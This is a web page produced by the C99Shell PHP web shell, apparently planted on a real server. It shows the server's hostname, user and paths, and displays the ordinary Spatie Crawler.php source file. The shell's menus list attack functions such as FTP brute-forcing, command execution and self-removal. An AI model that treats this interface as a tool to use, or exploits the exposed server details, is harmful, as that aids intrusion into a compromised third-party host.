!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/spatie/crawler/src/   drwxr-xr-x
Free 28.86 GB of 117.98 GB (24.47%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Crawler.php (13.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\Crawler;

use 
Generator;
use 
GuzzleHttp\Client;
use 
GuzzleHttp\Pool;
use 
GuzzleHttp\Psr7\Request;
use 
GuzzleHttp\Psr7\Uri;
use 
GuzzleHttp\RequestOptions;
use 
Psr\Http\Message\UriInterface;
use 
Spatie\Browsershot\Browsershot;
use 
Spatie\Crawler\CrawlObservers\CrawlObserver;
use 
Spatie\Crawler\CrawlObservers\CrawlObserverCollection;
use 
Spatie\Crawler\CrawlProfiles\CrawlAllUrls;
use 
Spatie\Crawler\CrawlProfiles\CrawlProfile;
use 
Spatie\Crawler\CrawlQueues\ArrayCrawlQueue;
use 
Spatie\Crawler\CrawlQueues\CrawlQueue;
use 
Spatie\Crawler\Exceptions\InvalidCrawlRequestHandler;
use 
Spatie\Crawler\Handlers\CrawlRequestFailed;
use 
Spatie\Crawler\Handlers\CrawlRequestFulfilled;
use 
Spatie\Robots\RobotsTxt;
use 
Tree\Node\Node;

class 
Crawler
{
    public const 
DEFAULT_USER_AGENT '*';

    protected 
UriInterface $baseUrl;

    protected 
CrawlObserverCollection $crawlObservers;

    protected 
CrawlProfile $crawlProfile;

    protected 
CrawlQueue $crawlQueue;

    protected 
int $totalUrlCount 0;

    protected 
int $currentUrlCount 0;

    protected ?
int $totalCrawlLimit null;

    protected ?
int $currentCrawlLimit null;

    protected 
int $maximumResponseSize 1024 1024 2;

    protected ?
int $maximumDepth null;

    protected 
bool $respectRobots true;

    protected 
bool $rejectNofollowLinks true;

    protected 
Node $depthTree;

    protected 
bool $executeJavaScript false;

    protected ?
Browsershot $browsershot null;

    protected ?
RobotsTxt $robotsTxt null;

    protected 
string $crawlRequestFulfilledClass;

    protected 
string $crawlRequestFailedClass;

    protected 
int $delayBetweenRequests 0;

    protected array 
$allowedMimeTypes = [];

    protected 
string $defaultScheme 'http';

    protected static array 
$defaultClientOptions = [
        
RequestOptions::COOKIES => true,
        
RequestOptions::CONNECT_TIMEOUT => 10,
        
RequestOptions::TIMEOUT => 10,
        
RequestOptions::ALLOW_REDIRECTS => false,
        
RequestOptions::HEADERS => [
            
'User-Agent' => self::DEFAULT_USER_AGENT,
        ],
    ];

    public static function 
create(array $clientOptions = []): static
    {
        
$clientOptions = (count($clientOptions))
            ? 
$clientOptions
            
: static::$defaultClientOptions;

        
$client = new Client($clientOptions);

        return new static(
$client);
    }

    public function 
__construct(
        protected 
Client $client,
        protected 
int $concurrency 10,
    ) {
        
$this->crawlProfile = new CrawlAllUrls();

        
$this->crawlQueue = new ArrayCrawlQueue();

        
$this->crawlObservers = new CrawlObserverCollection();

        
$this->crawlRequestFulfilledClass CrawlRequestFulfilled::class;

        
$this->crawlRequestFailedClass CrawlRequestFailed::class;
    }

    public function 
getDefaultScheme(): string
    
{
        return 
$this->defaultScheme;
    }

    public function 
setDefaultScheme(string $defaultScheme): self
    
{
        
$this->defaultScheme $defaultScheme;

        return 
$this;
    }

    public function 
setConcurrency(int $concurrency): self
    
{
        
$this->concurrency $concurrency;

        return 
$this;
    }

    public function 
setMaximumResponseSize(int $maximumResponseSizeInBytes): self
    
{
        
$this->maximumResponseSize $maximumResponseSizeInBytes;

        return 
$this;
    }

    public function 
getMaximumResponseSize(): ?int
    
{
        return 
$this->maximumResponseSize;
    }

    public function 
setTotalCrawlLimit(int $totalCrawlLimit): self
    
{
        
$this->totalCrawlLimit $totalCrawlLimit;

        return 
$this;
    }

    public function 
getTotalCrawlLimit(): ?int
    
{
        return 
$this->totalCrawlLimit;
    }

    public function 
getTotalCrawlCount(): int
    
{
        return 
$this->totalUrlCount;
    }

    public function 
setCurrentCrawlLimit(int $currentCrawlLimit): self
    
{
        
$this->currentCrawlLimit $currentCrawlLimit;

        return 
$this;
    }

    public function 
getCurrentCrawlLimit(): ?int
    
{
        return 
$this->currentCrawlLimit;
    }

    public function 
getCurrentCrawlCount(): int
    
{
        return 
$this->currentUrlCount;
    }

    public function 
setMaximumDepth(int $maximumDepth): self
    
{
        
$this->maximumDepth $maximumDepth;

        return 
$this;
    }

    public function 
getMaximumDepth(): ?int
    
{
        return 
$this->maximumDepth;
    }

    public function 
setDelayBetweenRequests(int $delayInMilliseconds): self
    
{
        
$this->delayBetweenRequests = ($delayInMilliseconds 1000);

        return 
$this;
    }

    public function 
getDelayBetweenRequests(): int
    
{
        return 
$this->delayBetweenRequests;
    }

    public function 
setParseableMimeTypes(array $types): self
    
{
        
$this->allowedMimeTypes $types;

        return 
$this;
    }

    public function 
getParseableMimeTypes(): array
    {
        return 
$this->allowedMimeTypes;
    }

    public function 
ignoreRobots(): self
    
{
        
$this->respectRobots false;

        return 
$this;
    }

    public function 
respectRobots(): self
    
{
        
$this->respectRobots true;

        return 
$this;
    }

    public function 
mustRespectRobots(): bool
    
{
        return 
$this->respectRobots;
    }

    public function 
acceptNofollowLinks(): self
    
{
        
$this->rejectNofollowLinks false;

        return 
$this;
    }

    public function 
rejectNofollowLinks(): self
    
{
        
$this->rejectNofollowLinks true;

        return 
$this;
    }

    public function 
mustRejectNofollowLinks(): bool
    
{
        return 
$this->rejectNofollowLinks;
    }

    public function 
getRobotsTxt(): RobotsTxt
    
{
        return 
$this->robotsTxt;
    }

    public function 
setCrawlQueue(CrawlQueue $crawlQueue): self
    
{
        
$this->crawlQueue $crawlQueue;

        return 
$this;
    }

    public function 
getCrawlQueue(): CrawlQueue
    
{
        return 
$this->crawlQueue;
    }

    public function 
executeJavaScript(): self
    
{
        
$this->executeJavaScript true;

        return 
$this;
    }

    public function 
doNotExecuteJavaScript(): self
    
{
        
$this->executeJavaScript false;

        return 
$this;
    }

    public function 
mayExecuteJavascript(): bool
    
{
        return 
$this->executeJavaScript;
    }

    public function 
setCrawlObserver(CrawlObserver | array $crawlObservers): self
    
{
        if (! 
is_array($crawlObservers)) {
            
$crawlObservers = [$crawlObservers];
        }

        return 
$this->setCrawlObservers($crawlObservers);
    }

    public function 
setCrawlObservers(array $crawlObservers): self
    
{
        
$this->crawlObservers = new CrawlObserverCollection($crawlObservers);

        return 
$this;
    }

    public function 
addCrawlObserver(CrawlObserver $crawlObserver): self
    
{
        
$this->crawlObservers->addObserver($crawlObserver);

        return 
$this;
    }

    public function 
getCrawlObservers(): CrawlObserverCollection
    
{
        return 
$this->crawlObservers;
    }

    public function 
setCrawlProfile(CrawlProfile $crawlProfile): self
    
{
        
$this->crawlProfile $crawlProfile;

        return 
$this;
    }

    public function 
getCrawlProfile(): CrawlProfile
    
{
        return 
$this->crawlProfile;
    }

    public function 
setCrawlFulfilledHandlerClass(string $crawlRequestFulfilledClass): self
    
{
        
$baseClass CrawlRequestFulfilled::class;

        if (! 
is_subclass_of($crawlRequestFulfilledClass$baseClass)) {
            throw 
InvalidCrawlRequestHandler::doesNotExtendBaseClass($crawlRequestFulfilledClass$baseClass);
        }

        
$this->crawlRequestFulfilledClass $crawlRequestFulfilledClass;

        return 
$this;
    }

    public function 
setCrawlFailedHandlerClass(string $crawlRequestFailedClass): self
    
{
        
$baseClass CrawlRequestFailed::class;

        if (! 
is_subclass_of($crawlRequestFailedClass$baseClass)) {
            throw 
InvalidCrawlRequestHandler::doesNotExtendBaseClass($crawlRequestFailedClass$baseClass);
        }

        
$this->crawlRequestFailedClass $crawlRequestFailedClass;

        return 
$this;
    }

    public function 
setBrowsershot(Browsershot $browsershot)
    {
        
$this->browsershot $browsershot;

        return 
$this;
    }

    public function 
setUserAgent(string $userAgent): self
    
{
        
$clientOptions $this->client->getConfig();

        
$headers array_change_key_case($clientOptions['headers']);
        
$headers['user-agent'] = $userAgent;

        
$clientOptions['headers'] = $headers;

        
$this->client = new Client($clientOptions);

        return 
$this;
    }

    public function 
getUserAgent(): string
    
{
        
$headers $this->client->getConfig('headers');

        foreach (
array_keys($headers) as $name) {
            if (
strtolower($name) === 'user-agent') {
                return (string) 
$headers[$name];
            }
        }

        return static::
DEFAULT_USER_AGENT;
    }

    public function 
getBrowsershot(): Browsershot
    
{
        if (! 
$this->browsershot) {
            
$this->browsershot = new Browsershot();
        }

        return 
$this->browsershot;
    }

    public function 
getBaseUrl(): UriInterface
    
{
        return 
$this->baseUrl;
    }

    public function 
startCrawling(UriInterface string $baseUrl)
    {
        if (! 
$baseUrl instanceof UriInterface) {
            
$baseUrl = new Uri($baseUrl);
        }

        if (
$baseUrl->getScheme() === '') {
            
$baseUrl $baseUrl->withScheme($this->defaultScheme);
        }

        if (
$baseUrl->getPath() === '') {
            
$baseUrl $baseUrl->withPath('/');
        }

        
$this->totalUrlCount $this->crawlQueue->getProcessedUrlCount();

        
$this->baseUrl $baseUrl;

        
$crawlUrl CrawlUrl::create($this->baseUrl);

        
$this->robotsTxt $this->createRobotsTxt($crawlUrl->url);

        if (
$this->robotsTxt->allows((string) $crawlUrl->url$this->getUserAgent()) ||
            ! 
$this->respectRobots
        
) {
            
$this->addToCrawlQueue($crawlUrl);
        }

        
$this->depthTree = new Node((string) $this->baseUrl);

        
$this->startCrawlingQueue();

        foreach (
$this->crawlObservers as $crawlObserver) {
            
$crawlObserver->finishedCrawling();
        }
    }

    public function 
addToDepthTree(UriInterface $urlUriInterface $parentUrlNode $node null): ?Node
    
{
        if (
is_null($this->maximumDepth)) {
            return new 
Node((string) $url);
        }

        
$node $node ?? $this->depthTree;

        
$returnNode null;

        if (
$node->getValue() === (string) $parentUrl) {
            
$newNode = new Node((string) $url);

            
$node->addChild($newNode);

            return 
$newNode;
        }

        foreach (
$node->getChildren() as $currentNode) {
            
$returnNode $this->addToDepthTree($url$parentUrl$currentNode);

            if (! 
is_null($returnNode)) {
                break;
            }
        }

        return 
$returnNode;
    }

    protected function 
startCrawlingQueue(): void
    
{
        while (
            
$this->reachedCrawlLimits() === false &&
            
$this->crawlQueue->hasPendingUrls()
        ) {
            
$pool = new Pool($this->client$this->getCrawlRequests(), [
                
'concurrency' => $this->concurrency,
                
'options' => $this->client->getConfig(),
                
'fulfilled' => new $this->crawlRequestFulfilledClass($this),
                
'rejected' => new $this->crawlRequestFailedClass($this),
            ]);

            
$promise $pool->promise();

            
$promise->wait();
        }
    }

    protected function 
createRobotsTxt(UriInterface $uri): RobotsTxt
    
{
        return 
RobotsTxt::create($uri->withPath('/robots.txt'));
    }

    protected function 
getCrawlRequests(): Generator
    
{
        while (
            
$this->reachedCrawlLimits() === false &&
            
$crawlUrl $this->crawlQueue->getPendingUrl()
        ) {
            if (
                
$this->crawlProfile->shouldCrawl($crawlUrl->url) === false ||
                
$this->crawlQueue->hasAlreadyBeenProcessed($crawlUrl)
            ) {
                
$this->crawlQueue->markAsProcessed($crawlUrl);

                continue;
            }

            foreach (
$this->crawlObservers as $crawlObserver) {
                
$crawlObserver->willCrawl($crawlUrl->url);
            }

            
$this->totalUrlCount++;
            
$this->currentUrlCount++;
            
$this->crawlQueue->markAsProcessed($crawlUrl);

            yield 
$crawlUrl->getId() => new Request('GET'$crawlUrl->url);
        }
    }

    public function 
addToCrawlQueue(CrawlUrl $crawlUrl): self
    
{
        if (! 
$this->getCrawlProfile()->shouldCrawl($crawlUrl->url)) {
            return 
$this;
        }

        if (
$this->getCrawlQueue()->has($crawlUrl->url)) {
            return 
$this;
        }

        
$this->crawlQueue->add($crawlUrl);

        return 
$this;
    }

    public function 
reachedCrawlLimits(): bool
    
{
        
$totalCrawlLimit $this->getTotalCrawlLimit();
        if (! 
is_null($totalCrawlLimit) && $this->getTotalCrawlCount() >= $totalCrawlLimit) {
            return 
true;
        }

        
$currentCrawlLimit $this->getCurrentCrawlLimit();
        if (! 
is_null($currentCrawlLimit) && $this->getCurrentCrawlCount() >= $currentCrawlLimit) {
            return 
true;
        }

        return 
false;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--